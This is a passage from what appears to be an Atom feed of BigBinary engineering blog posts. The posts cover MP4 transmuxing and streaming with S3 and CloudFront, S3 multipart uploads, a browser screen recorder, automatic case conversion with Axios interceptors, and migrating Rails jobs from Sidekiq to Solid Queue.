transcoding process. 
But that will not be easy to scale. So, we decided to use a serverless solution that would automatically scale. Since our input files were on AWS S3, AWS Lambda was the obvious choice.</p><p>We installed FFMPEG on <a href="https://aws.amazon.com/lambda/">AWS Lambda</a> using a <a href="https://docs.aws.amazon.com/lambda/latest/dg/chapter-layers.html">Layer</a> as described in this <a href="https://aws.amazon.com/blogs/media/processing-user-generated-content-using-aws-lambda-and-ffmpeg">post</a>.</p><p>We configured our input S3 bucket (the one to which WEBM files were uploaded) to trigger Lambda whenever a new file was uploaded. FFMPEG would then transcode WEBM to MP4 and store the output in another S3 bucket.</p><p>This worked as expected. But performance was still a problem. The time taken was proportional to the input file size and took longer than we found acceptable.</p><h3>Transmuxing instead of transcoding</h3><p>Transmuxing, or stream copy, is a fast process that doesn't involve re-encoding but instead directly copies the existing audio and video streams into a new container format. This approach works well when the codecs used in the input file (WebM) are compatible with the output container format (MP4).</p><p>Popular browsers like Chrome, Brave, Safari, etc. use the H.264 codec for video encoding. This is compatible with MP4, so transmuxing works flawlessly. But Firefox uses the VP8 or VP9 codec, which is incompatible with MP4. Since we were planning to build a Chrome extension for NeetoRecord, we only needed to worry about Chrome, and we could ignore Firefox users for now.</p><pre><code>ffmpeg -i input.webm -c:v copy -c:a copy output.mp4</code></pre><p>We modified the ffmpeg command as shown above. It now uses the <code>-c:v copy</code> and <code>-c:a copy</code> options, which copy the video and audio from the input file to the output file without re-encoding. 
MP4 conversion now became extremely fast, and the time taken did not increase significantly with the size of the input file.</p><h2>Streaming</h2><p>Now that we successfully generated MP4 files, it was time to think of delivering the file efficiently to the client (browser) for playback. We had two problems to solve:</p><ol><li><p>S3 is a storage service. It is not suitable for content delivery.</p><ul><li>Relatively high data transfer costs.</li><li>Storage is in one geographical region, resulting in slower delivery over the network.</li></ul></li><li><p>Video files are large in size. Downloading the entire file and then playing it back is not efficient in terms of speed and data transfer. We needed to find a way to allow streaming of the files, i.e. deliver chunks of data as and when they are needed by the client.</p></li></ol><h3>CloudFront as CDN</h3><p>CloudFront is a content delivery network (CDN) service provided by AWS. It can be used as a CDN for S3, and this combination is a common architecture for distributing content globally with low latency and high transfer speeds.</p><p>We created a CloudFront distribution, which is connected to our MP4 bucket. Once the distribution is deployed, we can access the MP4 files using the CloudFront domain name. When users request content through CloudFront, CloudFront checks its cache for the requested content. If the content is in the cache and is still valid (based on cache-control headers), CloudFront serves the content directly from its edge locations, reducing latency. If the content is not in the cache or is expired, CloudFront retrieves the content from the S3 bucket, caches it, and serves it to the user. This helps reduce the load on our S3 bucket and improves the performance of content delivery.</p><h3>The HTTP Range request header</h3><p>HTTP Range requests allow clients to request specific portions of a file from a server. 
This feature enables users to stream or download only the parts of the file they need, reducing bandwidth usage and improving user experience. At first, the client could request the range for the beginning of the video file, and then, as the playback proceeds, request subsequent parts. If the user moves back and forth in the video using the seek bar, the corresponding ranges can be requested.</p><pre><code>GET /example.mp4 HTTP/1.1
Host: example.com
Range: bytes=5000-9999</code></pre><p><code>Range: bytes=5000-9999</code> is the Range header indicating the specific bytes the client wants to retrieve. In this case, the client requests bytes 5000 to 9999 of the MP4 file. The numbering starts from zero, so byte 5000 means the 5001st byte in the file.</p><p>The server responds with a <code>206</code> (Partial Content) response with the requested sequence of bytes in the body. If the server does not support range requests, then it responds with a <code>200</code> along with the full content.</p><h4>Checking if the server supports Range requests</h4><p>We can perform a check by issuing a HEAD request to see if the server supports Range requests.</p><pre><code>curl -I http://abc.com/1.mp4</code></pre><p>If range requests are supported, then the server responds with an <code>Accept-Ranges: bytes</code> header.</p><pre><code>HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 146515</code></pre><p>We did the test on our S3 bucket directly first, and then through CloudFront. Both <a href="https://docs.aws.amazon.com/whitepapers/latest/s3-optimizing-performance-best-practices/use-byte-range-fetches.html">S3</a> and <a href="https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/RangeGETs.html">CloudFront</a> support Range request headers.</p><p>MP4, as mentioned above, supports streaming. It has metadata to help the server deliver it in chunks as requested. 
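</p><p>As a small illustration (a hypothetical sketch, not NeetoRecord code), a client fetching a file in chunks computes a Range header for each request and can parse the Content-Range header that accompanies a 206 response:</p><pre><code class="language-javascript">// Build the Range header value for a chunk starting at byte offset "start".
// Byte ranges are inclusive, so a 5000-byte chunk at offset 5000 is 5000-9999.
function rangeHeaderFor(start, chunkSize) {
  return 'bytes=' + start + '-' + (start + chunkSize - 1);
}

// Parse a Content-Range response header such as 'bytes 5000-9999/146515'.
function parseContentRange(header) {
  const match = header.match(/bytes (\d+)-(\d+)\/(\d+)/);
  if (match === null) return null;

  return {
    start: Number(match[1]),
    end: Number(match[2]),
    total: Number(match[3]),
  };
}</code></pre><p>The HTML5 video player performs this bookkeeping internally; the sketch only shows the header arithmetic involved.</p><p>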
The HTML5 video player supports progressive download automatically by making use of HTTP Range headers.</p><p>So now we have our video in a file format that supports streaming (MP4), a web server that supports Range headers (S3 and CloudFront) and a client that uses Range headers for progressive download - all the ingredients needed to support streaming.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Efficient uploading and persistent storage of NeetoRecord videos using AWS S3]]></title>
       <author><name>Unnikrishnan KP</name></author>
      <link href="https://www.bigbinary.com/blog/persistant-storage-for-recordings-in-s3-loom-alternative-part-2"/>
      <updated>2024-03-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/persistant-storage-for-recordings-in-s3-loom-alternative-part-2</id>
      <content type="html"><![CDATA[<p>This is part 2 of our blog on how we are building <a href="https://www.neeto.com/neetorecord">NeetoRecord</a>, a Loom alternative. Here are <a href="https://www.bigbinary.com/blog/build-web-based-screen-recorder-loom-alternative-part-1">part 1</a> and <a href="https://www.bigbinary.com/blog/mp4_transmuxing_and_streaming_support-loom-alternative-part-3">part 3</a>.</p><p>In the previous blog, we learned how to use the Browser APIs to record the screen and generate a WEBM file. We now need to upload this file to persistent storage to have a URL to share our recording with our audience.</p><p>Uploading a large file all at once is time-consuming and prone to failure due to network errors. The recording is generated in parts, each part pushed to an array and joined together. So it would be ideal if we could upload these smaller parts as and when they are generated, and then join them together in the backend once the recording is completed. AWS's <a href="https://aws.amazon.com/s3/">Simple Storage Service (S3)</a> was a perfect fit, as it provides cheap persistent storage along with a <a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/mpuoverview.html">Multipart Uploads</a> feature.</p><p>S3 Multipart Uploads allow us to upload large objects in parts. Rather than uploading the entire object in a single operation, multipart uploads break it down into smaller parts, each ranging from 5 MB to 5 GB. Once uploaded, these parts are aggregated to form the complete object.</p><h2>Initialization</h2><p>The process begins with an initiation request to S3, where a unique upload ID is generated. This upload ID is used to identify and manage the individual parts of the upload.</p><pre><code>s3 = Aws::S3::Client.new

resp = s3.create_multipart_upload({
  bucket: bucket_name,
  key: object_key
})

upload_id = resp.upload_id</code></pre><h2>Upload Parts</h2><p>Once the upload is initiated, we can upload the parts to S3 independently.
Each part is associated with a sequence number and an ETag (Entity Tag), a checksum of the part's data.</p><p>Note that the minimum content size for a part is 5 MB (there is no minimum size limit on the last part of your multipart upload). So we store the recording chunks in local storage until they are bigger than 5 MB. Once we have a part greater than 5 MB, we upload it to S3.</p><pre><code>part_number = 1
content = recordedChunks

resp = s3.upload_part({
  body: content,
  bucket: bucket_name,
  key: object_key,
  upload_id: upload_id,
  part_number: part_number
})

puts &quot;ETag for Part #{part_number}: #{resp.etag}&quot;</code></pre><h2>Completion</h2><p>Once all parts are uploaded, a complete multipart upload request is sent to S3, specifying the upload ID and the list of uploaded parts along with their ETags and sequence numbers. S3 then assembles the parts into a single object and finalizes the upload.</p><pre><code>completed_parts = [
  { part_number: 1, etag: 'etag_of_part_1' },
  { part_number: 2, etag: 'etag_of_part_2' },
  ...
  { part_number: N, etag: 'etag_of_part_N' },
]

resp = s3.complete_multipart_upload({
  bucket: bucket_name,
  key: object_key,
  upload_id: upload_id,
  multipart_upload: {
    parts: completed_parts
  }
})</code></pre><h2>Aborting and Cancelling</h2><p>At any point during the multipart upload process, you can abort or cancel the upload, which deletes any uploaded parts associated with the upload ID.</p><pre><code>s3.abort_multipart_upload({
  bucket: bucket_name,
  key: object_key,
  upload_id: upload_id
})</code></pre><p>The uploaded file will finally be available at <code>s3://bucket_name/object_key</code>.</p><p>S3 Multipart Uploads offer us several advantages:</p><h3>Fault tolerance</h3><p>We can resume uploads from where they left off in case of network failures or interruptions.
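</p>

<p>The buffering rule described above (accumulate recording chunks until the 5 MB part minimum is reached, then flush a part) can be sketched as pure logic. This is an illustrative sketch, not the NeetoRecord code; chunk sizes are plain byte counts and <code>uploadPart</code> is a hypothetical stand-in for the actual S3 upload call:</p>

```javascript
// S3's minimum part size; only the final part may be smaller.
const PART_MIN_BYTES = 5 * 1024 * 1024;

// Buffers incoming chunk sizes and calls uploadPart(bytes) whenever at
// least 5 MB has accumulated. finish() flushes whatever remains when the
// recording stops.
const makePartBuffer = uploadPart => {
  let buffered = 0;
  return {
    push(chunkBytes) {
      buffered += chunkBytes;
      if (buffered >= PART_MIN_BYTES) {
        uploadPart(buffered);
        buffered = 0;
      }
    },
    finish() {
      if (buffered > 0) uploadPart(buffered);
      buffered = 0;
    },
  };
};
```

<p>With real recordings, the buffer would hold the actual Blob chunks (concatenating them for upload) rather than byte counts, but the flush condition is the same.</p>

<p>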
Also, uploading large objects in smaller parts reduces the likelihood of timeouts and connection failures, especially in high-latency or unreliable network environments.</p><h3>Upload speed optimization</h3><p>With multipart uploads, you can parallelize the process by uploading multiple parts concurrently, optimizing transfer speeds and reducing overall upload time.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Building a web-based screen recorder]]></title>
       <author><name>Unnikrishnan KP</name></author>
      <link href="https://www.bigbinary.com/blog/build-web-based-screen-recorder-loom-alternative-part-1"/>
      <updated>2024-03-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/build-web-based-screen-recorder-loom-alternative-part-1</id>
      <content type="html"><![CDATA[<p>This is part 1 of our blog on how we are building <a href="https://www.neeto.com/neetorecord">NeetoRecord</a>, a Loom alternative. Here are <a href="https://www.bigbinary.com/blog/persistant-storage-for-recordings-in-s3-loom-alternative-part-2">part 2</a> and <a href="https://www.bigbinary.com/blog/mp4_transmuxing_and_streaming_support-loom-alternative-part-3">part 3</a>.</p><p>At <a href="https://neeto.com">neeto</a>, the product team, developers, and the UI team often communicate using short videos and screen recordings. We relied on popular solutions like Loom and Bubbles. But they allowed only a small number of recordings in their free versions, and soon, they presented us with the upgrade screens - upgrades were quite expensive for our team due to our team size and the number of recordings we made daily.</p><p>So, we decided to build our own solution. We found the browser's MediaStream Recording API.</p><h2>MediaStream Recording API</h2><p>The MediaStream Recording API, sometimes called the MediaRecorder API, is closely affiliated with the <a href="https://developer.mozilla.org/en-US/docs/Web/API/Media_Capture_and_Streams_API">Media Capture and Streams API</a> and the <a href="https://developer.mozilla.org/en-US/docs/Web/API/WebRTC_API">WebRTC API</a>. The MediaStream Recording API enables capturing the data generated by a MediaStream or HTMLMediaElement. Captured video data is in WebM format. We can play it back later using the <a href="https://developer.mozilla.org/en-US/docs/Web/API/HTMLVideoElement">HTMLVideoElement</a> on any video player that supports WebM playback.</p><p>We will build a basic recorder that records the screen and audio from the microphone, and then plays it back. We will first look at different fragments of code for recording the screen, recording audio, playing back in the browser and then downloading the video file.
At the end, we will combine them into a fully working web-based screen recorder program.</p><h3>Record the screen</h3><pre><code class="language-javascript">let mediaRecorder;
let recordedChunks = [];

const stream = await navigator.mediaDevices.getDisplayMedia({
  video: true,
});

mediaRecorder = new MediaRecorder(stream);

mediaRecorder.ondataavailable = event =&gt; {
  recordedChunks.push(event.data);
};</code></pre><p><code>getDisplayMedia()</code> is provided by the <a href="https://developer.mozilla.org/en-US/docs/Web/API/WebRTC_API">WebRTC</a> (Web Real-Time Communication) API. It captures the contents of the user's screen or specific application windows. The <code>getDisplayMedia()</code> method prompts the user to select and grant permission to capture the contents of a display or portion thereof (such as a window) as a MediaStream.</p><p>There is a similar method called <code>getUserMedia()</code>. It is typically used for applications like video conferencing and live streaming. When you call <code>getUserMedia()</code>, the browser prompts the user for permission to access their camera and microphone.</p><p>When there is recorded data available, the <code>ondataavailable</code> callback is triggered. We could process the data in this callback. In our case, we collect the data by appending it to an array named <code>recordedChunks</code>.</p><h3>Record audio</h3><pre><code class="language-javascript">let audioStream = await window.navigator.mediaDevices.getUserMedia({
  audio: { echoCancellation: true, noiseSuppression: true },
});</code></pre><p>To capture audio, we use <code>getUserMedia()</code>.
As mentioned above, when you call <code>getUserMedia()</code>, the browser prompts the user for permission to access their camera and microphone. But we want to capture only the audio, so we pass only the <code>audio</code> parameter.</p><p>The <code>audio</code> key accepts a set of parameters that let us control the quality and properties of the captured audio stream. In our example, we have enabled <code>echoCancellation</code> and <code>noiseSuppression</code> - two good features that would enhance the quality of our screen recordings. The complete list of audio options is available <a href="https://developer.mozilla.org/en-US/docs/Web/API/MediaTrackSettings#instance_properties_of_audio_tracks">here</a>.</p><p>The audio stream could be composed of multiple audio tracks - the microphone, system sounds, etc. We will add these tracks to the video stream we had previously set up using <code>getDisplayMedia()</code>.</p><pre><code class="language-javascript">audioStream.getAudioTracks().forEach(audioTrack =&gt; stream.addTrack(audioTrack));</code></pre><h3>Playback the recording</h3><p>We now have an array named <code>recordedChunks</code>, which contains sequential chunks of the recorded data. Video players need video data as a <a href="https://developer.mozilla.org/en-US/docs/Web/API/Blob">Blob</a>. A blob is a file-like object of immutable, raw binary/text data.
We must convert our <code>recordedChunks</code> array into a <code>Blob</code> to be played back or written into a file.</p><p>To construct a Blob from other non-blob objects and data, we can use the <code>Blob()</code> constructor.</p><pre><code class="language-javascript">const blob = new Blob(recordedChunks, {
  type: &quot;video/webm&quot;,
});</code></pre><p>Suppose we have an <a href="https://www.w3schools.com/tags/tag_video.asp">HTML video tag</a> in our page.</p><pre><code class="language-html">&lt;video id=&quot;recordedVideo&quot; controls&gt;&lt;/video&gt;</code></pre><p>When the video recording is stopped, we can create an Object URL for our recording <code>blob</code> and attach it to the video player.</p><pre><code class="language-javascript">mediaRecorder.onstop = () =&gt; {
  let recordedVideo = document.getElementById(&quot;recordedVideo&quot;);
  recordedVideo.src = URL.createObjectURL(blob);
};</code></pre><p>We can now play the recording on the HTML video player.</p><p>Similarly, we can create a download link using the Object URL for the recording <code>blob</code>.</p><pre><code class="language-javascript">let a = document.createElement(&quot;a&quot;);
let url = URL.createObjectURL(blob);
a.href = url;</code></pre><p>We can now download and play the recording locally on any video player supporting WebM playback.</p><h2>Putting it all together</h2><p>We have glued together the code fragments discussed above and created a <a href="/blog/neeto_record/basic_screen_recorder.html">demo</a> for a basic web-based screen recorder.</p><p>You may view the source code <a href="https://gist.github.com/unnitallman/6a054300f8bba645d42fd04008ea6ff1">here</a>.</p><h2>Next steps</h2><p>Now that we have a basic screen recorder in place, we have to consider the following:</p><ol><li>Persistent storage.</li><li>Chunked uploading.</li><li>CDN support.</li><li>Playback with support for streaming.</li></ol><p>We will cover these topics in the next set of blogs.
Stay tuned.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Automating Case Conversion in Axios for Seamless Frontend-Backend Integration]]></title>
       <author><name>Ajmal Noushad</name></author>
      <link href="https://www.bigbinary.com/blog/axios-case-conversion"/>
      <updated>2024-03-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/axios-case-conversion</id>
      <content type="html"><![CDATA[<p>In the world of web development, conventions often differ between backend and frontend technologies. This becomes evident when comparing the variable naming case conventions used in Ruby on Rails (snake case) and JavaScript (camel case). At Neeto, this difference posed a major hurdle: the requirement for manual case conversion between requests and responses. As a result, a significant amount of repetitive code was needed to handle this conversion.</p><p>Here's a snippet illustrating the issue faced by our team:</p><pre><code class="language-js">// For requests, we had to manually convert camelCase values to snake_case.
const createUser = ({ userName, fullName, dateOfBirth }) =&gt;
  axios.post(&quot;/api/v1/users&quot;, {
    user_name: userName,
    full_name: fullName,
    date_of_birth: dateOfBirth,
  });

// For responses, we had to manually convert snake_case values to camelCase.
const {
  user_name: userName,
  full_name: fullName,
  date_of_birth: dateOfBirth,
} = await axios.get(&quot;/api/v1/users/user-id-1&quot;);</code></pre><p>This manual conversion process consumed valuable development time and introduced the risk of errors or inconsistencies in data handling.</p><p>To streamline our workflow and enhance interoperability between the frontend and backend, we decided to automate case conversion.</p><h2>Implementing automatic case conversion</h2><p>Implementing automatic case conversion across Neeto products required a thoughtful approach to minimize disruptions and ensure a smooth transition. Here's how we achieved this goal:</p><h3>1. Axios Interceptors for Recursive Case Conversion</h3><p>We created a pair of Axios interceptors to handle case conversion for requests and responses. The interceptors were designed to recursively convert the cases, managing the translation between snake case and camel case as data traveled between the frontend and backend.
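</p>

<p>The key-conversion step these interceptors rely on can be illustrated with a simplified, standalone converter. This is a sketch for illustration only, not the actual <code>@bigbinary/neeto-cist</code> implementation:</p>

```javascript
// Simplified sketch of recursive key conversion: camelizes the keys of
// plain objects and arrays, leaving primitive values untouched.
const snakeToCamel = key =>
  key.replace(/_([a-z])/g, (_, char) => char.toUpperCase());

const keysToCamelCase = value => {
  if (Array.isArray(value)) return value.map(keysToCamelCase);
  if (value === null || typeof value !== "object") return value;

  return Object.fromEntries(
    Object.entries(value).map(([key, val]) => [
      snakeToCamel(key),
      keysToCamelCase(val),
    ])
  );
};
```

<p>For example, <code>keysToCamelCase({ user_name: "a", posts: [{ created_at: 1 }] })</code> returns <code>{ userName: "a", posts: [{ createdAt: 1 }] }</code>. A response interceptor applies such a function to <code>response.data</code>, while a request interceptor performs the inverse conversion.</p>

<p>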
This simplified the workflow, cutting out the need for manual case conversion in most situations.</p><h3>2. Custom Parameters to Control Case Conversion</h3><p>To roll out the change smoothly without breaking any products - and because certain special APIs required specific case conventions due to legacy reasons or external dependencies - we introduced the custom parameters <code>transformResponseCase</code> and <code>transformRequestCase</code> within Axios. These parameters allowed developers to opt out of the automatic case conversion for specific API endpoints. By configuring these parameters appropriately, we prevented unintentional case conversions where needed, maintaining compatibility with APIs that required different conventions.</p><p>This is how we crafted our axios interceptors:</p><pre><code class="language-js">import {
  keysToCamelCase,
  serializeKeysToSnakeCase,
} from &quot;@bigbinary/neeto-cist&quot;;

// To transform response data to camel case
const transformResponseKeysToCamelCase = response =&gt; {
  const { transformResponseCase = true } = response.config;

  if (response.data &amp;&amp; transformResponseCase) {
    response.data = keysToCamelCase(response.data);
  }

  return response;
};

// To transform error response data to camel case
const transformErrorKeysToCamelCase = error =&gt; {
  const { transformResponseCase = true } = error.config ?? {};

  if (error.response?.data &amp;&amp; transformResponseCase) {
    error.response.data = keysToCamelCase(error.response.data);
  }

  return Promise.reject(error);
};

// To transform the request payload to snake_case
const transformDataToSnakeCase = request =&gt; {
  const { transformRequestCase = true } = request;

  if (!transformRequestCase) return request;

  request.data = serializeKeysToSnakeCase(request.data);
  request.params = serializeKeysToSnakeCase(request.params);

  return request;
};

// Adding interceptors
axios.interceptors.request.use(transformDataToSnakeCase);
axios.interceptors.response.use(
  transformResponseKeysToCamelCase,
  transformErrorKeysToCamelCase
);</code></pre><p>Note that <code>keysToCamelCase</code> and <code>serializeKeysToSnakeCase</code> are methods from our open source pure utils library <a href="https://github.com/bigbinary/neeto-cist"><code>@bigbinary/neeto-cist</code></a>.</p><p>While rolling out the change to all products, we wrote a JSCodeShift script to automatically add these flags to every Axios API request in all Neeto products, to ensure that nothing was broken. The team then manually went through the code base and removed those flags while making the necessary changes to the code.</p><p>After the change was introduced, the API code was much cleaner, without the boilerplate for case conversion.</p><pre><code class="language-js">// Request
const createUser = ({ userName, fullName, dateOfBirth }) =&gt;
  axios.post(&quot;/api/v1/users&quot;, { userName, fullName, dateOfBirth });

// Response
const { userName, fullName, dateOfBirth } = await axios.get(
  &quot;/api/v1/users/user-id-1&quot;
);</code></pre><h2>Pain points</h2><p>In our work towards automating case conversion within neeto, we encountered several pain points.</p><h3>1. Manual work is involved</h3><p>During the rollout phase of our automated case conversion solution, there was an unavoidable requirement for manual intervention.
As we transitioned the existing code bases to the new mechanism for automatic case conversion within Axios, each Axios call needed an adjustment to remove the manual case conversion code written before.</p><p>This stage demanded some manual work from our development teams. They updated and modified existing Axios requests across multiple projects to ensure they aligned with the new automated case conversion mechanism. While this manual effort temporarily increased the workload, it was a necessary step to implement the automated solution effectively across Neeto.</p><p>This phase highlighted the importance of a structured rollout plan and meticulous attention to detail. Despite the initial manual workload, once the changes were applied uniformly across the codebase, the benefits of automated case conversion quickly became evident, significantly reducing ongoing manual efforts and improving the overall efficiency of our development process.</p><h3>2. Serialization Issues</h3><p>In our initial implementation of automated case conversion, we used the <code>keysToSnakeCase</code> method, which recursively transforms all the keys of a given object to snake case.
It internally used the <code>transformObjectDeep</code> function to recursively traverse each key-value pair inside an object for transformation.</p><pre><code class="language-js">import { camelToSnakeCase } from &quot;@bigbinary/neeto-cist&quot;;

const transformObjectDeep = (object, keyValueTransformer) =&gt; {
  if (Array.isArray(object)) {
    return object.map(obj =&gt; transformObjectDeep(obj, keyValueTransformer));
  } else if (object === null || typeof object !== &quot;object&quot;) {
    return object;
  }

  return Object.fromEntries(
    Object.entries(object).map(([key, value]) =&gt;
      keyValueTransformer(key, transformObjectDeep(value, keyValueTransformer))
    )
  );
};

export const keysToSnakeCase = object =&gt;
  transformObjectDeep(object, (key, value) =&gt; [camelToSnakeCase(key), value]);</code></pre><p>However, this recursive transformation approach led to a serialization issue, especially with objects that required special treatment, such as <code>dayjs</code> objects representing dates. The method treated these objects like any other JavaScript object, causing unexpected transformations and resulting in invalid payload data in some cases.</p><p>To mitigate these serialization issues and prevent interference with specific object types, we enhanced the <code>transformObjectDeep</code> method to accept a preprocessor function that is applied to objects before the transformation:</p><pre><code class="language-js">const transformObjectDeep = (
  object,
  keyValueTransformer,
  objectPreProcessor = undefined
) =&gt; {
  if (objectPreProcessor &amp;&amp; typeof objectPreProcessor === &quot;function&quot;) {
    object = objectPreProcessor(object);
  }

  // Existing transformation logic
};</code></pre><p>This modification allowed us to serialize objects before initiating the transformation process.
To facilitate this, we introduced a new method, <code>serializeKeysToSnakeCase</code>, incorporating the object preprocessor. For specific object types requiring special serialization, such as <code>dayjs</code> objects, we leveraged the built-in <code>toJSON</code> method, allowing the object to transform itself into its desired format, such as a date string:</p><pre><code class="language-js">import { transformObjectDeep, camelToSnakeCase } from &quot;@bigbinary/neeto-cist&quot;;

export const serializeKeysToSnakeCase = object =&gt;
  transformObjectDeep(
    object,
    (key, value) =&gt; [camelToSnakeCase(key), value],
    object =&gt; (typeof object?.toJSON === &quot;function&quot; ? object.toJSON() : object)
  );</code></pre><p>This resolved the serialization issue for the request payloads. Since the response is always in JSON format, all values are objects, arrays, or primitives. It won't contain such 'magical' objects. So we need this logic only for request interceptors.</p><h2>Conclusion</h2><p>In simplifying our web development workflow at Neeto, automating case conversion proved crucial. Despite challenges during implementation, refining our methods strengthened our system. By streamlining data translation and overcoming hurdles like serialization issues, we've improved efficiency and compatibility across our ecosystem.</p><p>If you're starting a new project, adopting automated case conversion mechanisms similar to what we've built in Axios can offer significant advantages. Implementing these standards from the beginning promotes consistency and simplifies how data moves between your frontend and backend systems. Introducing these practices early in your project's lifecycle helps sidestep the difficulties of adjusting existing code and establishes a unified convention throughout your project's structure.</p><p>For existing projects, adopting automated case conversion might initially come with a cost.
Introducing these changes requires careful planning and execution to minimize disruptions. The rollout process might necessitate manual updates across various parts of the codebase, leading to an increased workload and potential short-term setbacks.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How we migrated from Sidekiq to Solid Queue]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/migrating-to-solid-queue-from-sidekiq"/>
      <updated>2024-03-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/migrating-to-solid-queue-from-sidekiq</id>
      <content type="html"><![CDATA[<p>BigBinary is building a suite of products under <a href="https://neeto.com">neeto</a>. We currently have around 22 products under development, and all of the products are using <a href="https://github.com/sidekiq/sidekiq">Sidekiq</a>. After the <a href="https://dev.37signals.com/introducing-solid-queue/">launch of Solid Queue</a>, we decided to migrate <a href="https://neeto.com/neetoform">NeetoForm</a> from Sidekiq to Solid Queue.</p><p>Please note that Solid Queue currently doesn't support cron-style or recurring jobs. There is a <a href="https://github.com/basecamp/solid_queue/pull/155">PR open</a> regarding this issue. We have only partially migrated to Solid Queue. For recurring jobs, we are still using Sidekiq. Once the PR is merged, we will migrate completely to Solid Queue.</p><h2>Migrating to Solid Queue from Sidekiq</h2><p>Here is a step-by-step migration guide you can use to migrate your Rails application from Sidekiq to Solid Queue.</p><h2>1. Installation</h2><ul><li>Add <code>gem &quot;solid_queue&quot;</code> to your Rails application's Gemfile and run <code>bundle install</code>.</li><li>Run <code>bin/rails generate solid_queue:install</code>, which copies the config file and the required migrations.</li><li>Run the migrations using <code>bin/rails db:migrate</code>.</li></ul><h2>2. Configuration</h2><p>The installation step should have created a <code>config/solid_queue.yml</code> file. Uncomment the file and modify it as per your needs.
Here is how the file looks for our application.</p><pre><code class="language-yaml">default: &amp;default
  dispatchers:
    - polling_interval: 1
      batch_size: 500
  workers:
    - queues: &quot;auth&quot;
      threads: 3
      processes: 1
      polling_interval: 0.1
    - queues: &quot;urgent&quot;
      threads: 3
      processes: 1
      polling_interval: 0.1
    - queues: &quot;low&quot;
      threads: 3
      processes: 1
      polling_interval: 2
    - queues: &quot;*&quot;
      threads: 3
      processes: 1
      polling_interval: 1

development:
  &lt;&lt;: *default

staging:
  &lt;&lt;: *default

heroku:
  &lt;&lt;: *default

test:
  &lt;&lt;: *default

production:
  &lt;&lt;: *default</code></pre><h2>3. Starting Solid Queue</h2><p>On your development machine, you can start Solid Queue by running the following command.</p><pre><code>bundle exec rake solid_queue:start</code></pre><p>This will start Solid Queue's supervisor process and will start processing any enqueued jobs. The supervisor process forks <a href="https://github.com/basecamp/solid_queue?tab=readme-ov-file#workers-and-dispatchers">workers and dispatchers</a> according to the configuration provided in the <code>config/solid_queue.yml</code> file. The supervisor process also controls the heartbeats of workers and dispatchers, and sends signals to stop and start them when needed.</p><p>Since we use <a href="https://github.com/ddollar/foreman">foreman</a>, we added the above command to our Procfile.</p><pre><code class="language-ruby"># Procfile
web:  bundle exec puma -C config/puma.rb
worker: bundle exec sidekiq -C config/sidekiq.yml
solidqueueworker: bundle exec rake solid_queue:start
release: bundle exec rake db:migrate</code></pre><h2>4. 
Setting the Active Job queue adapter</h2><p>You can set the Active Job queue adapter to <code>:solid_queue</code> by adding the following line in your <code>application.rb</code> file.</p><pre><code class="language-ruby"># application.rb
config.active_job.queue_adapter = :solid_queue</code></pre><p>The above change sets the queue adapter at the application level for all the jobs. However, since we wanted to use Solid Queue for our regular jobs and continue using Sidekiq for cron jobs, we didn't make the above change in <code>application.rb</code>.</p><p>Instead, we created a new base class that inherits from <code>ApplicationJob</code> and sets the queue adapter to <code>:solid_queue</code>.</p><pre><code class="language-ruby"># sq_base_job.rb
class SqBaseJob &lt; ApplicationJob
  self.queue_adapter = :solid_queue
end</code></pre><p>Then we made all the classes implementing regular jobs inherit from this new class <code>SqBaseJob</code> instead of <code>ApplicationJob</code>.</p><pre><code class="language-diff"># send_email_job.rb
- class SendEmailJob &lt; ApplicationJob
+ class SendEmailJob &lt; SqBaseJob
  # ...
end</code></pre><p>By making the above change, all our regular jobs got enqueued via Solid Queue instead of Sidekiq.</p><p>But we realized later that emails were still being sent via Sidekiq. On debugging and looking into Rails internals, we found that <code>ActionMailer</code> uses <code>ActionMailer::MailDeliveryJob</code> for enqueuing or sending emails.</p><p><code>ActionMailer::MailDeliveryJob</code> inherits from <code>ActiveJob::Base</code> rather than the application's <code>ApplicationJob</code>. So even if we set the queue_adapter in <code>application_job.rb</code>, it won't work. <code>ActionMailer::MailDeliveryJob</code> falls back to using the adapter defined in <code>application.rb</code> or in the environment-specific (production.rb / staging.rb / development.rb) config files.
But we can't do that because we still want to use Sidekiq for cron jobs.</p><p>To use Solid Queue for mailers, we needed to override the queue_adapter for mailers. We can do that in <code>application_mailer.rb</code>.</p><pre><code class="language-ruby"># application_mailer.rb
class ApplicationMailer &lt; ActionMailer::Base
  # ...

  ActionMailer::MailDeliveryJob.queue_adapter = :solid_queue
end</code></pre><p>This change is needed only while we use both Sidekiq and Solid Queue. Once the cron-style jobs feature lands in Solid Queue, we can remove this override and set the queue_adapter directly in <code>application.rb</code>, which will enforce the setting globally.</p><h2>5. Code changes</h2><p>For migrating from Sidekiq to Solid Queue, we had to make the following changes to the syntax for enqueuing a job.</p><ul><li>Replaced <code>.perform_async</code> with <code>.perform_later</code>.</li><li>Replaced <code>.perform_at</code> with <code>.set(...).perform_later(...)</code>.</li></ul><pre><code class="language-diff">- SendMailJob.perform_async
+ SendMailJob.perform_later

- SendMailJob.perform_at(1.minute.from_now)
+ SendMailJob.set(wait: 1.minute).perform_later</code></pre><p>At some places we were storing the Job ID on a record, for querying the job's status or for cancelling the job. For such cases, we made the following change.</p><pre><code class="language-diff">def disable_form_at_deadline
- job_id = DisableFormJob.perform_at(deadline, self.id)
- self.disable_job_id = job_id
+ job = DisableFormJob.set(wait_until: deadline).perform_later(self.id)
+ self.disable_job_id = job.job_id
end

def cancel_form_deadline
- Sidekiq::Status.cancel(self.disable_job_id)
+ SolidQueue::Job.find_by(active_job_id: self.disable_job_id).destroy!
  self.disable_job_id = nil
end</code></pre><h2>6. 
